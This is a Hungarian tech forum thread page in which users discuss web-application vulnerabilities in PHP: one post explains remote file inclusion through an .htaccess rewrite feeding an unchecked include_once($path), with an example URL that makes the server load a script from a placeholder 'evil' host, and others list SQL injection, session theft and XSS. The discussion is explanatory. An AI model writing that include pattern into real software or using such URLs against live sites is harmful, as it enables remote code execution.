- India betiltja a pénzalapú online játékokat
- Az előírások megszegése miatt éghet le egyes alaplapokon a Socket AM5 foglalat
- Módosítana a CHIPS-törvény kifizetésein a Trump adminisztráció
- Egy friss tanulmány szerint az AI-ban utazó cégek 95%-a csak elégeti a pénzét
- A frissített, béta verziójú NVIDIA Apphoz készült az új GeForce driver
- NVIDIA GeForce RTX 4060 / 4070 S/Ti/TiS (AD104/103)
- AMD Ryzen 9 / 7 / 5 9***(X) "Zen 5" (AM5)
- VR topik (Oculus Rift, stb.)
- ThinkPad (NEM IdeaPad)
- Milyen alaplapot vegyek?
- Milyen asztali (teljes vagy fél-) gépet vegyek?
- Bambu Lab 3D nyomtatók
- Milyen RAM-ot vegyek?
- Azonnali fotós kérdések órája
- TCL LCD és LED TV-k
Új hozzászólás Aktív témák
-
disy68
aktív tag
válasz
MacCaine
#18710
üzenetére
RFI. Én olyannal találkoztam, hogy a routing volt megoldva ellenőrizetlen bemenetekkel szép url megoldásnál.
Pl: oldal.hu/aloldal
htaccess-el volt egy átirányítás
RewriteRule ^(.*)$ /index.php?path=$1 [NC,L,QSA]ahol az aloldal került a $path változóba, majd ez lett include-olva.
include_once($path);Szóval meghívva a oldal.hu/http://gonoszoldal.hu/meggonoszabb_script.php
Az kerül meghívásra, hogyinclude_once('http://gonoszoldal.hu/meggonoszabb_script.php
'); -
disy68
aktív tag
válasz
MacCaine
#18705
üzenetére
Na így más a helyzet kicsit. Mi az elvárás? Csak a php-s alkalmazás problémáit megtalálni vagy az egész rendszerét? Ha az előbbi, akkor a korábbi link, illetve ez segíthet.
Ha az utóbbi, akkor bonyolódik a helyzet. Ha a webszerver apache, akkor a linkelt oldalon elindulhatsz. Ezen kívül persze lehet az oprendszer is gyenge pont és máris jóval terjedelmesebb a lehetséges sebezhetőségek száma. Nem is beszélve az esetleges egymásra épülő hibák kihasználásáról. -
DNReNTi
őstag
válasz
MacCaine
#18705
üzenetére
Konkretan a webszerverre valo betoreshez nem gondolnam, hogy a PHP lenne a belepesi pont. Ez inkabb linux/unix varazslat kellene hogy legyen. Ha konkretan egy PHP alapu alkalmazast akarsz felnyomni, az mas. Akkor jo kiindulasi alap amit disy68 linkelt.
En SQL injection-nel kezdenem, aztan lehet tovabbmenni session lopassal, XSS-el, esatobbi. Mondom ezt ugy, hogy sose csinaltam meg ilyesmit. -
disy68
aktív tag
-
DNReNTi
őstag
válasz
MacCaine
#18700
üzenetére
Nem feltetlenul kell a konkret peldat megosztani, linkekkel, hozzaferessel es koddal, teszem azt kaptal egy finom SQL injection-t, eleg megkerdezni mit tegyel ellene, min valtoztass, vagy mondjuk valami robot arto fajlt tol es futtata a szervereden, mit lehet tenni, esetleg hogyan authentikalj helyesen.
Ezekre akkor is lehet valaszolni, ha az ember nem tudja pontosan melyik oldalrol van szo. No de nem okoskodok, ha privat, akkor legyen privat. -
De ha lenne ilyen topik, en olvasgatnam.
En SQL injection-nel kezdenem, aztan lehet tovabbmenni session lopassal, XSS-el, esatobbi. Mondom ezt ugy, hogy sose csinaltam meg ilyesmit.
Ejnye.Új hozzászólás Aktív témák
Hirdetés
- Nők, nőügyek (18+)
- Renault, Dacia topik
- NVIDIA GeForce RTX 4060 / 4070 S/Ti/TiS (AD104/103)
- Ingatlanos topic!
- PH!otósok beszélgetős, offolós topikja
- AMD Ryzen 9 / 7 / 5 9***(X) "Zen 5" (AM5)
- Nyíregyháza és környéke adok-veszek-beszélgetek
- Windows 11
- VR topik (Oculus Rift, stb.)
- Eredeti játékok OFF topik
- További aktív témák...
- Eladó RTX 3090 24GB Videókártyák (Suprim, Aorus, Gaming X) Felső kategóriás! Jótállással! Dobozos!
- Yamaha 5.1 hangrendszer NS-LC5 / NS-CLC5 / NS-ELC5 + YST-SW012 mélynyomó
- Precision 5550 15.6" FHD+ IPS i7-10850H T1000 16GB 512GB NVMe magyar vbill ujjlolv IR kam gar
- Gamer PC-Számítógép! Csere-Beszámítás! R5 3600 / GTX 1080 8GB / 32GB DDR4 / 512 SSD!
- Eladó ASUS ROG Strix B550-F alaplap (olvass!)
- Dell 16 Inspiron 5625 FHD+ IPS Ryzen5 5625U 4.3Ghz 16GB 512GB SSD Radeon RX Vega7 Win11 Garancia
- HP EliteBook 835 G7 AMD Ryzen 5 4650U
- Gamer egerek és billentyűzetek kitűnő árakon! Most extra 10% kedvezmény!
- HP 15S FHD LED Matt Ryzen5 5500U 4.0Ghz 8GB RAM 256GB SSD Radeon RX Vega7 Win11 Garancia
- Új Dell 13 Inspiron 5310 FHD+ IPS i5-11300H 4.4Ghz 8GB 256GB Intel Iris XE Graphics Win11 Garancia
Állásajánlatok
Cég: FOTC
Város: Budapest